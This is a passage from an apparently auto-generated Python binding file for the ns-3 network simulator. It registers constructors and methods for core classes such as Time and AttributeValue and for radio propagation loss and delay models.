cls.add_method('Cleanup',
'void',
[],
is_static=True)
return
def register_Ns3SimpleRefCount__Ns3AttributeValue_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeValue__gt___methods(root_module, cls):
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> >::SimpleRefCount() [constructor]
cls.add_constructor([])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> >::SimpleRefCount(ns3::SimpleRefCount<ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> > const & o) [copy constructor]
cls.add_constructor([param('ns3::SimpleRefCount< ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter< ns3::AttributeValue > > const &', 'o')])
## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> >::Cleanup() [member function]
cls.add_method('Cleanup',
'void',
[],
is_static=True)
return
def register_Ns3SimpleRefCount__Ns3CallbackImplBase_Ns3Empty_Ns3DefaultDeleter__lt__ns3CallbackImplBase__gt___methods(root_module, cls):
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> >::SimpleRefCount() [constructor]
cls.add_constructor([])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> >::SimpleRefCount(ns3::SimpleRefCount<ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> > const & o) [copy constructor]
cls.add_constructor([param('ns3::SimpleRefCount< ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter< ns3::CallbackImplBase > > const &', 'o')])
## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> >::Cleanup() [member function]
cls.add_method('Cleanup',
'void',
[],
is_static=True)
return
def register_Ns3SimpleRefCount__Ns3TraceSourceAccessor_Ns3Empty_Ns3DefaultDeleter__lt__ns3TraceSourceAccessor__gt___methods(root_module, cls):
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> >::SimpleRefCount() [constructor]
cls.add_constructor([])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> >::SimpleRefCount(ns3::SimpleRefCount<ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> > const & o) [copy constructor]
cls.add_constructor([param('ns3::SimpleRefCount< ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter< ns3::TraceSourceAccessor > > const &', 'o')])
## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> >::Cleanup() [member function]
cls.add_method('Cleanup',
'void',
[],
is_static=True)
return
def register_Ns3ThreeLogDistancePropagationLossModel_methods(root_module, cls):
## propagation-loss-model.h (module 'propagation'): static ns3::TypeId ns3::ThreeLogDistancePropagationLossModel::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## propagation-loss-model.h (module 'propagation'): ns3::ThreeLogDistancePropagationLossModel::ThreeLogDistancePropagationLossModel() [constructor]
cls.add_constructor([])
## propagation-loss-model.h (module 'propagation'): double ns3::ThreeLogDistancePropagationLossModel::DoCalcRxPower(double txPowerDbm, ns3::Ptr<ns3::MobilityModel> a, ns3::Ptr<ns3::MobilityModel> b) const [member function]
cls.add_method('DoCalcRxPower',
'double',
[param('double', 'txPowerDbm'), param('ns3::Ptr< ns3::MobilityModel >', 'a'), param('ns3::Ptr< ns3::MobilityModel >', 'b')],
is_const=True, visibility='private', is_virtual=True)
return
def register_Ns3Time_methods(root_module, cls):
cls.add_binary_numeric_operator('+', root_module['ns3::Time'], root_module['ns3::Time'], param('ns3::Time const &', 'right'))
cls.add_binary_numeric_operator('-', root_module['ns3::Time'], root_module['ns3::Time'], param('ns3::Time const &', 'right'))
cls.add_binary_comparison_operator('<')
cls.add_binary_comparison_operator('>')
cls.add_binary_comparison_operator('!=')
cls.add_inplace_numeric_operator('+=', param('ns3::Time const &', 'right'))
cls.add_inplace_numeric_operator('-=', param('ns3::Time const &', 'right'))
cls.add_output_stream_operator()
cls.add_binary_comparison_operator('<=')
cls.add_binary_comparison_operator('==')
cls.add_binary_comparison_operator('>=')
## nstime.h (module 'core'): ns3::Time::Time() [constructor]
cls.add_constructor([])
## nstime.h (module 'core'): ns3::Time::Time(ns3::Time const & o) [copy constructor]
cls.add_constructor([param('ns3::Time const &', 'o')])
## nstime.h (module 'core'): ns3::Time::Time(double v) [constructor]
cls.add_constructor([param('double', 'v')])
## nstime.h (module 'core'): ns3::Time::Time(int v) [constructor]
cls.add_constructor([param('int', 'v')])
## nstime.h (module 'core'): ns3::Time::Time(long int v) [constructor]
cls.add_constructor([param('long int', 'v')])
## nstime.h (module 'core'): ns3::Time::Time(long long int v) [constructor]
cls.add_constructor([param('long long int', 'v')])
## nstime.h (module 'core'): ns3::Time::Time(unsigned int v) [constructor]
cls.add_constructor([param('unsigned int', 'v')])
## nstime.h (module 'core'): ns3::Time::Time(long unsigned int v) [constructor]
cls.add_constructor([param('long unsigned int', 'v')])
## nstime.h (module 'core'): ns3::Time::Time(long long unsigned int v) [constructor]
cls.add_constructor([param('long long unsigned int', 'v')])
## nstime.h (module 'core'): ns3::Time::Time(std::string const & s) [constructor]
cls.add_constructor([param('std::string const &', 's')])
## nstime.h (module 'core'): ns3::Time::Time(ns3::int64x64_t const & value) [constructor]
cls.add_constructor([param('ns3::int64x64_t const &', 'value')])
## nstime.h (module 'core'): int ns3::Time::Compare(ns3::Time const & o) const [member function]
cls.add_method('Compare',
'int',
[param('ns3::Time const &', 'o')],
is_const=True)
## nstime.h (module 'core'): static ns3::Time ns3::Time::From(ns3::int64x64_t const & from, ns3::Time::Unit timeUnit) [member function]
cls.add_method('From',
'ns3::Time',
[param('ns3::int64x64_t const &', 'from'), param('ns3::Time::Unit', 'timeUnit')],
is_static=True)
## nstime.h (module 'core'): static ns3::Time ns3::Time::From(ns3::int64x64_t const & value) [member function]
cls.add_method('From',
'ns3::Time',
[param('ns3::int64x64_t const &', 'value')],
is_static=True)
## nstime.h (module 'core'): static ns3::Time ns3::Time::FromDouble(double value, ns3::Time::Unit timeUnit) [member function]
cls.add_method('FromDouble',
'ns3::Time',
[param('double', 'value'), param('ns3::Time::Unit', 'timeUnit')],
is_static=True)
## nstime.h (module 'core'): static ns3::Time ns3::Time::FromInteger(uint64_t value, ns3::Time::Unit timeUnit) [member function]
cls.add_method('FromInteger',
'ns3::Time',
[param('uint64_t', 'value'), param('ns3::Time::Unit', 'timeUnit')],
is_static=True)
## nstime.h (module 'core'): double ns3::Time::GetDouble() const [member function]
cls.add_method('GetDouble',
'double',
[],
is_const=True)
## nstime.h (module 'core'): int64_t ns3::Time::GetFemtoSeconds() const [member function]
cls.add_method('GetFemtoSeconds',
'int64_t',
[],
is_const=True)
## nstime.h (module 'core'): int64_t ns3::Time::GetInteger() const [member function]
cls.add_method('GetInteger',
'int64_t',
[],
is_const=True)
## nstime.h (module 'core'): int64_t ns3::Time::GetMicroSeconds() const [member function]
cls.add_method('GetMicroSeconds',
'int64_t',
[],
is_const=True)
## nstime.h (module 'core'): int64_t ns3::Time::GetMilliSeconds() const [member function]
cls.add_method('GetMilliSeconds',
'int64_t',
[],
is_const=True)
## nstime.h (module 'core'): int64_t ns3::Time::GetNanoSeconds() const [member function]
cls.add_method('GetNanoSeconds',
'int64_t',
[],
is_const=True)
## nstime.h (module 'core'): int64_t ns3::Time::GetPicoSeconds() const [member function]
cls.add_method('GetPicoSeconds',
'int64_t',
[],
is_const=True)
## nstime.h (module 'core'): static ns3::Time::Unit ns3::Time::GetResolution() [member function]
cls.add_method('GetResolution',
'ns3::Time::Unit',
[],
is_static=True)
## nstime.h (module 'core'): double ns3::Time::GetSeconds() const [member function]
cls.add_method('GetSeconds',
'double',
[],
is_const=True)
## nstime.h (module 'core'): int64_t ns3::Time::GetTimeStep() const [member function]
cls.add_method('GetTimeStep',
'int64_t',
[],
is_const=True)
## nstime.h (module 'core'): bool ns3::Time::IsNegative() const [member function]
cls.add_method('IsNegative',
'bool',
[],
is_const=True)
## nstime.h (module 'core'): bool ns3::Time::IsPositive() const [member function]
cls.add_method('IsPositive',
'bool',
[],
is_const=True)
## nstime.h (module 'core'): bool ns3::Time::IsStrictlyNegative() const [member function]
cls.add_method('IsStrictlyNegative',
'bool',
[],
is_const=True)
## nstime.h (module 'core'): bool ns3::Time::IsStrictlyPositive() const [member function]
cls.add_method('IsStrictlyPositive',
'bool',
[],
is_const=True)
## nstime.h (module 'core'): bool ns3::Time::IsZero() const [member function]
cls.add_method('IsZero',
'bool',
[],
is_const=True)
## nstime.h (module 'core'): static void ns3::Time::SetResolution(ns3::Time::Unit resolution) [member function]
cls.add_method('SetResolution',
'void',
[param('ns3::Time::Unit', 'resolution')],
is_static=True)
## nstime.h (module 'core'): ns3::int64x64_t ns3::Time::To(ns3::Time::Unit timeUnit) const [member function]
cls.add_method('To',
'ns3::int64x64_t',
[param('ns3::Time::Unit', 'timeUnit')],
is_const=True)
## nstime.h (module 'core'): double ns3::Time::ToDouble(ns3::Time::Unit timeUnit) const [member function]
cls.add_method('ToDouble',
'double',
[param('ns3::Time::Unit', 'timeUnit')],
is_const=True)
## nstime.h (module 'core'): int64_t ns3::Time::ToInteger(ns3::Time::Unit timeUnit) const [member function]
cls.add_method('ToInteger',
'int64_t',
[param('ns3::Time::Unit', 'timeUnit')],
is_const=True)
return
def register_Ns3TraceSourceAccessor_methods(root_module, cls):
## trace-source-accessor.h (module 'core'): ns3::TraceSourceAccessor::TraceSourceAccessor(ns3::TraceSourceAccessor const & arg0) [copy constructor]
cls.add_constructor([param('ns3::TraceSourceAccessor const &', 'arg0')])
## trace-source-accessor.h (module 'core'): ns3::TraceSourceAccessor::TraceSourceAccessor() [constructor]
cls.add_constructor([])
## trace-source-accessor.h (module 'core'): bool ns3::TraceSourceAccessor::Connect(ns3::ObjectBase * obj, std::string context, ns3::CallbackBase const & cb) const [member function]
cls.add_method('Connect',
'bool',
[param('ns3::ObjectBase *', 'obj', transfer_ownership=False), param('std::string', 'context'), param('ns3::CallbackBase const &', 'cb')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## trace-source-accessor.h (module 'core'): bool ns3::TraceSourceAccessor::ConnectWithoutContext(ns3::ObjectBase * obj, ns3::CallbackBase const & cb) const [member function]
cls.add_method('ConnectWithoutContext',
'bool',
[param('ns3::ObjectBase *', 'obj', transfer_ownership=False), param('ns3::CallbackBase const &', 'cb')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## trace-source-accessor.h (module 'core'): bool ns3::TraceSourceAccessor::Disconnect(ns3::ObjectBase * obj, std::string context, ns3::CallbackBase const & cb) const [member function]
cls.add_method('Disconnect',
'bool',
[param('ns3::ObjectBase *', 'obj', transfer_ownership=False), param('std::string', 'context'), param('ns3::CallbackBase const &', 'cb')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## trace-source-accessor.h (module 'core'): bool ns3::TraceSourceAccessor::DisconnectWithoutContext(ns3::ObjectBase * obj, ns3::CallbackBase const & cb) const [member function]
cls.add_method('DisconnectWithoutContext',
'bool',
[param('ns3::ObjectBase *', 'obj', transfer_ownership=False), param('ns3::CallbackBase const &', 'cb')],
is_pure_virtual=True, is_const=True, is_virtual=True)
return
def register_Ns3TwoRayGroundPropagationLossModel_methods(root_module, cls):
## propagation-loss-model.h (module 'propagation'): static ns3::TypeId ns3::TwoRayGroundPropagationLossModel::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## propagation-loss-model.h (module 'propagation'): ns3::TwoRayGroundPropagationLossModel::TwoRayGroundPropagationLossModel() [constructor]
cls.add_constructor([])
## propagation-loss-model.h (module 'propagation'): void ns3::TwoRayGroundPropagationLossModel::SetLambda(double frequency, double speed) [member function]
cls.add_method('SetLambda',
'void',
[param('double', 'frequency'), param('double', 'speed')])
## propagation-loss-model.h (module 'propagation'): void ns3::TwoRayGroundPropagationLossModel::SetLambda(double lambda) [member function]
cls.add_method('SetLambda',
'void',
[param('double', 'lambda')])
## propagation-loss-model.h (module 'propagation'): void ns3::TwoRayGroundPropagationLossModel::SetSystemLoss(double systemLoss) [member function]
cls.add_method('SetSystemLoss',
'void',
[param('double', 'systemLoss')])
## propagation-loss-model.h (module 'propagation'): void ns3::TwoRayGroundPropagationLossModel::SetMinDistance(double minDistance) [member function]
cls.add_method('SetMinDistance',
'void',
[param('double', 'minDistance')])
## propagation-loss-model.h (module 'propagation'): double ns3::TwoRayGroundPropagationLossModel::GetMinDistance() const [member function]
cls.add_method('GetMinDistance',
'double',
[],
is_const=True)
## propagation-loss-model.h (module 'propagation'): double ns3::TwoRayGroundPropagationLossModel::GetLambda() const [member function]
cls.add_method('GetLambda',
'double',
[],
is_const=True)
## propagation-loss-model.h (module 'propagation'): double ns3::TwoRayGroundPropagationLossModel::GetSystemLoss() const [member function]
cls.add_method('GetSystemLoss',
'double',
[],
is_const=True)
## propagation-loss-model.h (module 'propagation'): void ns3::TwoRayGroundPropagationLossModel::SetHeightAboveZ(double heightAboveZ) [member function]
cls.add_method('SetHeightAboveZ',
'void',
[param('double', 'heightAboveZ')])
## propagation-loss-model.h (module 'propagation'): double ns3::TwoRayGroundPropagationLossModel::DoCalcRxPower(double txPowerDbm, ns3::Ptr<ns3::MobilityModel> a, ns3::Ptr<ns3::MobilityModel> b) const [member function]
cls.add_method('DoCalcRxPower',
'double',
[param('double', 'txPowerDbm'), param('ns3::Ptr< ns3::MobilityModel >', 'a'), param('ns3::Ptr< ns3::MobilityModel >', 'b')],
is_const=True, visibility='private', is_virtual=True)
return
def register_Ns3AttributeAccessor_methods(root_module, cls):
## attribute.h (module 'core'): ns3::AttributeAccessor::AttributeAccessor(ns3::AttributeAccessor const & arg0) [copy constructor]
cls.add_constructor([param('ns3::AttributeAccessor const &', 'arg0')])
## attribute.h (module 'core'): ns3::AttributeAccessor::AttributeAccessor() [constructor]
cls.add_constructor([])
## attribute.h (module 'core'): bool ns3::AttributeAccessor::Get(ns3::ObjectBase const * object, ns3::AttributeValue & attribute) const [member function]
cls.add_method('Get',
'bool',
[param('ns3::ObjectBase const *', 'object'), param('ns3::AttributeValue &', 'attribute')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): bool ns3::AttributeAccessor::HasGetter() const [member function]
cls.add_method('HasGetter',
'bool',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): bool ns3::AttributeAccessor::HasSetter() const [member function]
cls.add_method('HasSetter',
'bool',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): bool ns3::AttributeAccessor::Set(ns3::ObjectBase * object, ns3::AttributeValue const & value) const [member function]
cls.add_method('Set',
'bool',
[param('ns3::ObjectBase *', 'object', transfer_ownership=False), param('ns3::AttributeValue const &', 'value')],
is_pure_virtual=True, is_const=True, is_virtual=True)
return
def register_Ns3AttributeChecker_methods(root_module, cls):
## attribute.h (module 'core'): ns3::AttributeChecker::AttributeChecker(ns3::AttributeChecker const & arg0) [copy constructor]
cls.add_constructor([param('ns3::AttributeChecker const &', 'arg0')])
## attribute.h (module 'core'): ns3::AttributeChecker::AttributeChecker() [constructor]
cls.add_constructor([])
## attribute.h (module 'core'): bool ns3::AttributeChecker::Check(ns3::AttributeValue const & value) const [member function]
cls.add_method('Check',
'bool',
[param('ns3::AttributeValue const &', 'value')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): bool ns3::AttributeChecker::Copy(ns3::AttributeValue const & source, ns3::AttributeValue & destination) const [member function]
cls.add_method('Copy',
'bool',
[param('ns3::AttributeValue const &', 'source'), param('ns3::AttributeValue &', 'destination')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::AttributeChecker::Create() const [member function]
cls.add_method('Create',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::AttributeChecker::CreateValidValue(ns3::AttributeValue const & value) const [member function]
cls.add_method('CreateValidValue',
'ns3::Ptr< ns3::AttributeValue >',
[param('ns3::AttributeValue const &', 'value')],
is_const=True)
## attribute.h (module 'core'): std::string ns3::AttributeChecker::GetUnderlyingTypeInformation() const [member function]
cls.add_method('GetUnderlyingTypeInformation',
'std::string',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): std::string ns3::AttributeChecker::GetValueTypeName() const [member function]
cls.add_method('GetValueTypeName',
'std::string',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): bool ns3::AttributeChecker::HasUnderlyingTypeInformation() const [member function]
cls.add_method('HasUnderlyingTypeInformation',
'bool',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
return
def register_Ns3AttributeValue_methods(root_module, cls):
## attribute.h (module 'core'): ns3::AttributeValue::AttributeValue(ns3::AttributeValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::AttributeValue const &', 'arg0')])
## attribute.h (module 'core'): ns3::AttributeValue::AttributeValue() [constructor]
cls.add_constructor([])
## attribute.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::AttributeValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): bool ns3::AttributeValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_pure_virtual=True, is_virtual=True)
## attribute.h (module 'core'): std::string ns3::AttributeValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_pure_virtual=True, is_const=True, is_virtual=True)
return
def register_Ns3CallbackChecker_methods(root_module, cls):
## callback.h (module 'core'): ns3::CallbackChecker::CallbackChecker() [constructor]
cls.add_constructor([])
## callback.h (module 'core'): ns3::CallbackChecker::CallbackChecker(ns3::CallbackChecker const & arg0) [copy constructor]
cls.add_constructor([param('ns3::CallbackChecker const &', 'arg0')])
return
def register_Ns3CallbackImplBase_methods(root_module, cls):
## callback.h (module 'core'): ns3::CallbackImplBase::CallbackImplBase() [constructor]
cls.add_constructor([])
## callback.h (module 'core'): ns3::CallbackImplBase::CallbackImplBase(ns3::CallbackImplBase const & arg0) [copy constructor]
cls.add_constructor([param('ns3::CallbackImplBase const &', 'arg0')])
## callback.h (module 'core'): bool ns3::CallbackImplBase::IsEqual(ns3::Ptr<ns3::CallbackImplBase const> other) const [member function]
cls.add_method('IsEqual',
'bool',
[param('ns3::Ptr< ns3::CallbackImplBase const >', 'other')],
is_pure_virtual=True, is_const=True, is_virtual=True)
return
def register_Ns3CallbackValue_methods(root_module, cls):
## callback.h (module 'core'): ns3::CallbackValue::CallbackValue(ns3::CallbackValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::CallbackValue const &', 'arg0')])
## callback.h (module 'core'): ns3::CallbackValue::CallbackValue() [constructor]
cls.add_constructor([])
## callback.h (module 'core'): ns3::CallbackValue::CallbackValue(ns3::CallbackBase const & base) [constructor]
cls.add_constructor([param('ns3::CallbackBase const &', 'base')])
## callback.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::CallbackValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, is_virtual=True)
## callback.h (module 'core'): bool ns3::CallbackValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_virtual=True)
## callback.h (module 'core'): std::string ns3::CallbackValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True, is_virtual=True)
## callback.h (module 'core'): void ns3::CallbackValue::Set(ns3::CallbackBase base) [member function]
cls.add_method('Set',
'void',
[param('ns3::CallbackBase', 'base')])
return
def register_Ns3ConstantSpeedPropagationDelayModel_methods(root_module, cls):
## propagation-delay-model.h (module 'propagation'): ns3::ConstantSpeedPropagationDelayModel::ConstantSpeedPropagationDelayModel(ns3::ConstantSpeedPropagationDelayModel const & arg0) [copy constructor]
cls.add_constructor([param('ns3::ConstantSpeedPropagationDelayModel const &', 'arg0')])
## propagation-delay-model.h (module 'propagation'): ns3::ConstantSpeedPropagationDelayModel::ConstantSpeedPropagationDelayModel() [constructor]
cls.add_constructor([])
## propagation-delay-model.h (module 'propagation'): ns3::Time ns3::ConstantSpeedPropagationDelayModel::GetDelay(ns3::Ptr<ns3::MobilityModel> a, ns3::Ptr<ns3::MobilityModel> b) const [member function]
cls.add_method('GetDelay',
'ns3::Time',
[param('ns3::Ptr< ns3::MobilityModel >', 'a'), param('ns3::Ptr< ns3::MobilityModel >', 'b')],
is_const=True, is_virtual=True)
## propagation-delay-model.h (module 'propagation'): double ns3::ConstantSpeedPropagationDelayModel::GetSpeed() const [member function]
cls.add_method('GetSpeed',
'double',
[],
is_const=True)
## propagation-delay-model.h (module 'propagation'): static ns3::TypeId ns3::ConstantSpeedPropagationDelayModel::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## propagation-delay-model.h (module 'propagation'): void ns3::ConstantSpeedPropagationDelayModel::SetSpeed(double speed) [member function]
cls.add_method('SetSpeed',
'void',
[param('double', 'speed')])
return
def register_Ns3Cost231PropagationLossModel_methods(root_module, cls):
## cost231-propagation-loss-model.h (module 'propagation'): static ns3::TypeId ns3::Cost231PropagationLossModel::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## cost231-propagation-loss-model.h (module 'propagation'): ns3::Cost231PropagationLossModel::Cost231PropagationLossModel() [constructor]
cls.add_constructor([])
## cost231-propagation-loss-model.h (module 'propagation'): double ns3::Cost231PropagationLossModel::GetLoss(ns3::Ptr<ns3::MobilityModel> a, ns3::Ptr<ns3::MobilityModel> b) const [member function]
cls.add_method('GetLoss',
'double',
[param('ns3::Ptr< ns3::MobilityModel >', 'a'), param('ns3::Ptr< ns3::MobilityModel >', 'b')],
is_const=True)
## cost231-propagation-loss-model.h (module 'propagation'): void ns3::Cost231PropagationLossModel::SetBSAntennaHeight(double height) [member function]
cls.add_method('SetBSAntennaHeight',
'void',
[param('double', 'height')])
## cost231-propagation-loss-model.h (module 'propagation'): void ns3::Cost231PropagationLossModel::SetSSAntennaHeight(double height) [member function]
cls.add_method('SetSSAntennaHeight',
'void',
[param('double', 'height')])
## cost231-propagation-loss-model.h (module 'propagation'): void ns3::Cost231PropagationLossModel::SetEnvironment(ns3::Cost231PropagationLossModel::Environment env) [member function]
cls.add_method('SetEnvironment',
'void',
[param('ns3::Cost231PropagationLossModel::Environment', 'env')])
## cost231-propagation-loss-model.h (module 'propagation'): void ns3::Cost231PropagationLossModel::SetLambda(double lambda) [member function]
cls.add_method('SetLambda',
'void',
[param('double', 'lambda')])
## cost231-propagation-loss-model.h (module 'propagation'): void ns3::Cost231PropagationLossModel::SetMinDistance(double minDistance) [member function]
cls.add_method('SetMinDistance',
'void',
[param('double', 'minDistance')])
## cost231-propagation-loss-model.h (module 'propagation'): double ns3::Cost231PropagationLossModel::GetBSAntennaHeight() const [member function]
cls.add_method('GetBSAntennaHeight',
'double',
[],
is_const=True)
## cost231-propagation-loss-model.h (module 'propagation'): double ns3::Cost231PropagationLossModel::GetSSAntennaHeight() const [member function]
cls.add_method('GetSSAntennaHeight',
'double',
[],
is_const=True)
## cost231-propagation-loss-model.h (module 'propagation'): ns3::Cost231PropagationLossModel::Environment ns3::Cost231PropagationLossModel::GetEnvironment() const [member function]
cls.add_method('GetEnvironment',
'ns3::Cost231PropagationLossModel::Environment',
[],
is_const=True)
## cost231-propagation-loss-model.h (module 'propagation'): double ns3::Cost231PropagationLossModel::GetMinDistance() const [member function]
cls.add_method('GetMinDistance',
'double',
[],
is_const=True)
## cost231-propagation-loss-model.h (module 'propagation'): double ns3::Cost231PropagationLossModel::GetLambda() const [member function]
cls.add_method('GetLambda',
'double',
[],
is_const=True)
## cost231-propagation-loss-model.h (module 'propagation'): void ns3::Cost231PropagationLossModel::SetLambda(double frequency, double speed) [member function]
cls.add_method('SetLambda',
'void',
[param('double', 'frequency'), param('double', 'speed')])
## cost231-propagation-loss-model.h (module 'propagation'): double ns3::Cost231PropagationLossModel::GetShadowing() [member function]
cls.add_method('GetShadowing',
'double',
[])
## cost231-propagation-loss-model.h (module 'propagation'): void ns3::Cost231PropagationLossModel::SetShadowing(double shadowing) [member function]
cls.add_method('SetShadowing',
'void',
[param('double', 'shadowing')])
## cost231-propagation-loss-model.h (module 'propagation'): double ns3::Cost231PropagationLossModel::DoCalcRxPower(double txPowerDbm, ns3::Ptr<ns3::MobilityModel> a, ns3::Ptr<ns3::MobilityModel> b) const [member function]
cls.add_method('DoCalcRxPower',
'double',
[param('double', 'txPowerDbm'), param('ns3::Ptr< ns3::MobilityModel >', 'a'), param('ns3::Ptr< ns3::MobilityModel >', 'b')],
is_const=True, visibility='private', is_virtual=True)
return
def register_Ns3EmptyAttributeValue_methods(root_module, cls):
## attribute.h (module 'core'): ns3::EmptyAttributeValue::EmptyAttributeValue(ns3::EmptyAttributeValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::EmptyAttributeValue const &', 'arg0')])
## attribute.h (module 'core'): ns3::EmptyAttributeValue::EmptyAttributeValue() [constructor]
cls.add_constructor([])
## attribute.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::EmptyAttributeValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, visibility='private', is_virtual=True)
## attribute.h (module 'core'): bool ns3::EmptyAttributeValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
visibility='private', is_virtual=True)
## attribute.h (module 'core'): std::string ns3::EmptyAttributeValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True, visibility='private', is_virtual=True)
return
def register_Ns3FixedRssLossModel_methods(root_module, cls):
## propagation-loss-model.h (module 'propagation'): static ns3::TypeId ns3::FixedRssLossModel::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## propagation-loss-model.h (module 'propagation'): ns3::FixedRssLossModel::FixedRssLossModel() [constructor]
cls.add_constructor([])
## propagation-loss-model.h (module 'propagation'): void ns3::FixedRssLossModel::SetRss(double rss) [member function]
cls.add_method('SetRss',
'void',
[param('double', 'rss')])
## propagation-loss-model.h (module 'propagation'): double ns3::FixedRssLossModel::DoCalcRxPower(double txPowerDbm, ns3::Ptr<ns3::MobilityModel> a, ns3::Ptr<ns3::MobilityModel> b) const [member function]
cls.add_method('DoCalcRxPower',
'double',
[param('double', 'txPowerDbm'), param('ns3::Ptr< ns3::MobilityModel >', 'a'), param('ns3::Ptr< ns3::MobilityModel >', 'b')],
is_const=True, visibility='private', is_virtual=True)
return
def register_Ns3FriisPropagationLossModel_methods(root_module, cls):
## propagation-loss-model.h (module 'propagation'): static ns3::TypeId ns3::FriisPropagationLossModel::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## propagation-loss-model.h (module 'propagation'): ns3::FriisPropagationLossModel::FriisPropagationLossModel() [constructor]
cls.add_constructor([])
## propagation-loss-model.h (module 'propagation'): void ns3::FriisPropagationLossModel::SetLambda(double frequency, double speed) [member function]
cls.add_method('SetLambda',
'void',
[param('double', 'frequency'), param('double', 'speed')])
## propagation-loss-model.h (module 'propagation'): void ns3::FriisPropagationLossModel::SetLambda(double lambda) [member function]
cls.add_method('SetLambda',
'void',
[param('double', 'lambda')])
## propagation-loss-model.h (module 'propagation'): void ns3::FriisPropagationLossModel::SetSystemLoss(double systemLoss) [member function]
cls.add_method('SetSystemLoss',
'void',
[param('double', 'systemLoss')])
## propagation-loss-model.h (module 'propagation'): void ns3::FriisPropagationLossModel::SetMinDistance(double minDistance) [member function]
cls.add_method('SetMinDistance',
'void',
[param('double', 'minDistance')])
## propagation-loss-model.h (module 'propagation'): double ns3::FriisPropagationLossModel::GetMinDistance() const [member function]
cls.add_method('GetMinDistance',
'double',
[],
is_const=True)
## propagation-loss-model.h (module 'propagation'): double ns3::FriisPropagationLossModel::GetLambda() const [member function]
